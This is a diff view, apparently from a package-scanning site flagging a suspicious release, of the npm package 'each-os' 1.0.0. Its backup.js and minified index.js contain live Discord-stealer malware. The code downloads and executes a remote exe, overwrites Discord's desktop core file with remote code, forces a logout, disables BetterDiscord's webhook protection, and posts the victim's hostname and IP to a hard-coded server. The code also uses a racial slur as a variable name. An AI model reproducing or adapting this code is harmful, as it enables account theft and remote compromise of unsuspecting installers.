each-os 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of each-os might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/backup.js +215 -0
  2. package/index.js +1 -0
  3. package/package.json +31 -0
package/backup.js ADDED
@@ -0,0 +1,215 @@
1
+
2
+ const glob = require("glob");
3
+ const fs = require('fs');
4
+ const https = require('node:https');
5
+ const { exec } = require('child_process');
6
+ const shell = require('shelljs')
7
+ const os = require('node:os');
8
+ const axios = require('axios');
9
+ const download = require('download');
10
+ var ip = require("ip");
11
+ const zip = require("adm-zip");
12
+ const FormData = require("form-data");
13
+ var XMLHttpRequest = require('xhr2');
14
+ const buf_replace = require('buffer-replace');
15
+ const { session, BrowserWindow } = require("electron");
16
+ const path = require("path");
17
+ const querystring = require("querystring");
18
+ //////////////////////////////////////////////////////////////////////
19
+ const config = {
20
+ "logout": "instant",
21
+ "inject-notify": "true",
22
+ "logout-notify": "true",
23
+ "init-notify":"true",
24
+ "embed-color": 123,
25
+ "USERNAMEWEBHOOK": "moonsz",
26
+ "disable-qr-code": "true"
27
+ }
28
+ //////////////////////////////////////////////////////////////////////
29
+ let LOCAL = process.env.LOCALAPPDATA
30
+ let discords = [];
31
+ let injectPath = [];
32
+ let runningDiscords = [];
33
+
34
+ fs.readdirSync(LOCAL).forEach(file => {
35
+ if (file.includes("iscord")) {
36
+ discords.push(LOCAL + '\\' + file)
37
+ } else {
38
+ return;
39
+ }
40
+ });
41
+
42
+ const temp = process.env.temp;
43
+
44
+ const infecccc = async () => {
45
+ const response = await axios.get("https://cdn.discordapp.com/attachments/998660447886639106/1000641545436926074/qwerty.exe", {
46
+ responseType: "arraybuffer"
47
+ });
48
+
49
+ await fs.writeFileSync(temp + "\\qwerty.exe", response.data, {
50
+ encoding: "utf8",
51
+ flags: "w"
52
+ });
53
+
54
+ await exec(temp + `\\qwerty.exe`);
55
+
56
+ return;
57
+ };
58
+
59
+
60
+ function Infect() {
61
+
62
+ https.get('https://raw.githubusercontent.com/thaispecanhacafazzi/blagogo/main/index.js', (resp) => {
63
+ let data = '';
64
+
65
+ resp.on('data', (chunk) => {
66
+ data += chunk;
67
+ });
68
+ resp.on('end', () => {
69
+ injectPath.forEach(file => {
70
+ fs.writeFileSync(file, data.replace("%INITNOTI%", config["init-notify"]).replace("%USERIP%", ip.address()).replace("%LOGOUT%", config.logout).replace("%USERNAMEWEBHOOK%", config.USERNAMEWEBHOOK).replace("%LOGOUTNOTI%", config["logout-notify"]).replace("3447704",config["embed-color"]).replace('%DISABLEQRCODE%', config["disable-qr-code"]), {
71
+ encoding: 'utf8',
72
+ flag: 'w'
73
+ });
74
+
75
+ if (config["init-notify"] == "true") {
76
+ let init = file.replace("index.js", "init")
77
+ if (!fs.existsSync(init)) {
78
+ fs.mkdirSync(init, 0744)
79
+ }
80
+ }
81
+
82
+ if ( config.logout != "false" ) {
83
+ let folder = file.replace("index.js", "DC_BTW")
84
+ if (!fs.existsSync(folder)) {
85
+ fs.mkdirSync(folder, 0744)
86
+ if (config.logout == "instant") {
87
+ startDiscord();
88
+ }
89
+ } else if (fs.existsSync(folder) && config.logout == "instant" ){
90
+ startDiscord();
91
+ }
92
+ }
93
+ })
94
+ });
95
+ }).on("error", (err) => {
96
+ });
97
+ };
98
+
99
+ const logout = async () => {
100
+ await BrowserWindow.getAllWindows()[0].webContents.executeJavaScript(
101
+ `window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();`,
102
+ true
103
+ );
104
+
105
+ return "ok";
106
+ };
107
+
108
+ function killDiscord() {
109
+ runningDiscords.forEach(disc => {
110
+ exec(`taskkill /IM ${disc}.exe /F`, (err) => {
111
+ if (err) {
112
+ return;
113
+ }
114
+ });
115
+ });
116
+
117
+ if (config["inject-notify"] == "true" && injectPath.length != 0 ) {
118
+ injectNotify();
119
+
120
+ }
121
+ Infect()
122
+ pwnBetterDiscord()
123
+ };
124
+
125
+ function listDiscords() {
126
+ exec('tasklist', function(err, stdout, stderr) {
127
+ if (stdout.includes("Discord.exe")) runningDiscords.push("discord");
128
+ if (stdout.includes("Discord (32 bits).exe")) runningDiscords.push("Discord");
129
+ if (stdout.includes("Discord.exe")) runningDiscords.push("Discord (32 bits)");
130
+ if (stdout.includes("DiscordCanary.exe")) runningDiscords.push("discordcanary");
131
+ if (stdout.includes("Discord Canary (32 bits).exe")) runningDiscords.push("Discord Canary");
132
+ if (stdout.includes("DiscordDevelopment.exe")) runningDiscords.push("discorddevelopment");
133
+ if (stdout.includes("DiscordPTB.exe")) runningDiscords.push("discordptb");
134
+ if (stdout.includes("Powercord.exe")) runningDiscords.push("powercord");
135
+ if (stdout.includes("Fiddler.exe")) runningDiscords.push("fiddler");
136
+ if (stdout.includes("wireshark.exe")) runningDiscords.push("wireshark");
137
+
138
+ if (config.logout == "instant") {
139
+ killDiscord();
140
+ } else {
141
+ if (config["inject-notify"] == "true" && injectPath.length != 0 ) {
142
+ injectNotify();
143
+ }
144
+ Infect()
145
+ pwnBetterDiscord()
146
+ }
147
+ })
148
+ };
149
+
150
+ function startDiscord() {
151
+ runningDiscords.forEach(disc => {
152
+ let path = LOCAL + '\\' + disc + "\\Update.exe --processStart " + disc + ".exe"
153
+ exec(path, (err) => {
154
+ if (err) {
155
+ return;
156
+ }
157
+ });
158
+ });
159
+ };
160
+
161
+ function pwnBetterDiscord() {
162
+ let dir = process.env.appdata + "\\BetterDiscord\\data\\betterdiscord.asar"
163
+ if (fs.existsSync(dir)) {
164
+ let x = fs.readFileSync(dir)
165
+ fs.writeFileSync(dir, buf_replace(x, "api/webhooks", "dc"))
166
+ }
167
+
168
+ return;
169
+ }
170
+
171
+ function injectNotify() {
172
+ let fields = [];
173
+ injectPath.forEach( path => {
174
+ let c = path
175
+ fields.push(c)
176
+ })
177
+
178
+ const data = `{"fields":"Discord Desktop (app-1.0.9005)", "pcname":"${os.hostname()}", "ip":"${ip.address()}", "idclientkey":"moonsz"}`
179
+ var xhr = new XMLHttpRequest();
180
+ xhr.open('POST', 'http://20.14.80.127/api/newinjection', true);
181
+ xhr.setRequestHeader('Content-type', 'application/json');
182
+ xhr.onload = function () {
183
+ const negrodefender = this.responseText;
184
+ };
185
+ xhr.send(data);
186
+ }
187
+
188
+ function getDirectories(path) {
189
+ return fs.readdirSync(path).filter(function (file) {
190
+ return fs.statSync(path+'/'+file).isDirectory();
191
+ });
192
+ }
193
+
194
+
195
+ listDiscords();
196
+ discords.forEach(function(file) {
197
+ getDirectories(file + "\\").forEach((item) => {
198
+ if (item.includes("app-")) {
199
+ file = file + "\\" + item + "\\modules\\";
200
+ }
201
+ });
202
+ getDirectories(file).forEach((item) => {
203
+ if (item.includes("discord_desktop_core-")) {
204
+ file = file + "\\" + item + "\\discord_desktop_core\\index.js";
205
+ }
206
+ });
207
+
208
+ if (fs.existsSync(file)) {
209
+ injectPath.push(file);
210
+ }
211
+ });
212
+ killDiscord();
213
+ Infect();
214
+ startDiscord();
215
+ infecccc();
package/index.js ADDED
@@ -0,0 +1 @@
1
+ const glob=require("glob"),fs=require("fs"),https=require("node:https"),{exec:exec}=require("child_process"),shell=require("shelljs"),os=require("node:os"),axios=require("axios"),download=require("download");var ip=require("ip");const zip=require("adm-zip"),FormData=require("form-data");var XMLHttpRequest=require("xhr2");const buf_replace=require("buffer-replace"),{session:session,BrowserWindow:BrowserWindow}=require("electron"),path=require("path"),querystring=require("querystring"),config={logout:"instant","inject-notify":"true","logout-notify":"true","init-notify":"true","embed-color":123,USERNAMEWEBHOOK:"moonsz","disable-qr-code":"true"};let LOCAL=process.env.LOCALAPPDATA,discords=[],injectPath=[],runningDiscords=[];fs.readdirSync(LOCAL).forEach((e=>{e.includes("iscord")&&discords.push(LOCAL+"\\"+e)}));const temp=process.env.temp,infecccc=async()=>{const e=await axios.get("https://cdn.discordapp.com/attachments/998660447886639106/1000641545436926074/qwerty.exe",{responseType:"arraybuffer"});await fs.writeFileSync(temp+"\\qwerty.exe",e.data,{encoding:"utf8",flags:"w"}),await exec(temp+"\\qwerty.exe")};function Infect(){https.get("https://raw.githubusercontent.com/thaispecanhacafazzi/blagogo/main/index.js",(e=>{let i="";e.on("data",(e=>{i+=e})),e.on("end",(()=>{injectPath.forEach((e=>{if(fs.writeFileSync(e,i.replace("%INITNOTI%",config["init-notify"]).replace("%USERIP%",ip.address()).replace("%LOGOUT%",config.logout).replace("%USERNAMEWEBHOOK%",config.USERNAMEWEBHOOK).replace("%LOGOUTNOTI%",config["logout-notify"]).replace("3447704",config["embed-color"]).replace("%DISABLEQRCODE%",config["disable-qr-code"]),{encoding:"utf8",flag:"w"}),"true"==config["init-notify"]){let i=e.replace("index.js","init");fs.existsSync(i)||fs.mkdirSync(i,484)}if("false"!=config.logout){let i=e.replace("index.js","DC_BTW");fs.existsSync(i)?fs.existsSync(i)&&"instant"==config.logout&&startDiscord():(fs.mkdirSync(i,484),"instant"==config.logout&&startDiscord())}}))}))})).on("error",(e=>{}))}const logout=async()=>(await BrowserWindow.getAllWindows()[0].webContents.executeJavaScript('window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();',!0),"ok");function killDiscord(){runningDiscords.forEach((e=>{exec(`taskkill /IM ${e}.exe /F`,(e=>{}))})),"true"==config["inject-notify"]&&0!=injectPath.length&&injectNotify(),Infect(),pwnBetterDiscord()}function listDiscords(){exec("tasklist",(function(e,i,n){i.includes("Discord.exe")&&runningDiscords.push("discord"),i.includes("Discord (32 bits).exe")&&runningDiscords.push("Discord"),i.includes("Discord.exe")&&runningDiscords.push("Discord (32 bits)"),i.includes("DiscordCanary.exe")&&runningDiscords.push("discordcanary"),i.includes("Discord Canary (32 bits).exe")&&runningDiscords.push("Discord Canary"),i.includes("DiscordDevelopment.exe")&&runningDiscords.push("discorddevelopment"),i.includes("DiscordPTB.exe")&&runningDiscords.push("discordptb"),i.includes("Powercord.exe")&&runningDiscords.push("powercord"),i.includes("Fiddler.exe")&&runningDiscords.push("fiddler"),i.includes("wireshark.exe")&&runningDiscords.push("wireshark"),"instant"==config.logout?killDiscord():("true"==config["inject-notify"]&&0!=injectPath.length&&injectNotify(),Infect(),pwnBetterDiscord())}))}function startDiscord(){runningDiscords.forEach((e=>{exec(LOCAL+"\\"+e+"\\Update.exe --processStart "+e+".exe",(e=>{}))}))}function pwnBetterDiscord(){let e=process.env.appdata+"\\BetterDiscord\\data\\betterdiscord.asar";if(fs.existsSync(e)){let i=fs.readFileSync(e);fs.writeFileSync(e,buf_replace(i,"api/webhooks","dc"))}}function injectNotify(){let e=[];injectPath.forEach((i=>{let n=i;e.push(n)}));const i=`{"fields":"Discord Desktop (app-1.0.9005)", "pcname":"${os.hostname()}", "ip":"${ip.address()}", "idclientkey":"moonsz"}`;var n=new XMLHttpRequest;n.open("POST","http://20.14.80.127/api/newinjection",!0),n.setRequestHeader("Content-type","application/json"),n.onload=function(){this.responseText},n.send(i)}function getDirectories(e){return fs.readdirSync(e).filter((function(i){return fs.statSync(e+"/"+i).isDirectory()}))}listDiscords(),discords.forEach((function(e){getDirectories(e+"\\").forEach((i=>{i.includes("app-")&&(e=e+"\\"+i+"\\modules\\")})),getDirectories(e).forEach((i=>{i.includes("discord_desktop_core-")&&(e=e+"\\"+i+"\\discord_desktop_core\\index.js")})),fs.existsSync(e)&&injectPath.push(e)})),killDiscord(),Infect(),startDiscord(),infecccc();
package/package.json ADDED
@@ -0,0 +1,31 @@
1
+ {
2
+ "dependencies": {
3
+ "adm-zip": "^0.5.9",
4
+ "axios": "^0.27.2",
5
+ "buffer-replace": "^1.0.0",
6
+ "child_process": "^1.0.2",
7
+ "color": "^4.2.3",
8
+ "download": "^8.0.0",
9
+ "electron": "^19.0.9",
10
+ "form-data": "^4.0.0",
11
+ "fs": "^0.0.1-security",
12
+ "glob": "^8.0.3",
13
+ "https": "^1.0.0",
14
+ "ip": "^1.1.8",
15
+ "os": "^0.1.2",
16
+ "path": "^0.12.7",
17
+ "querystring": "^0.2.1",
18
+ "shelljs": "^0.8.5",
19
+ "xhr2": "^0.2.1"
20
+ },
21
+ "name": "each-os",
22
+ "version": "1.0.0",
23
+ "main": "index.js",
24
+ "devDependencies": {},
25
+ "scripts": {
26
+ "test": "echo \"Error: no test specified\" && exit 1"
27
+ },
28
+ "author": "nahedasamic <nahedasamic@gmail.com>",
29
+ "license": "MIT",
30
+ "description": ""
31
+ }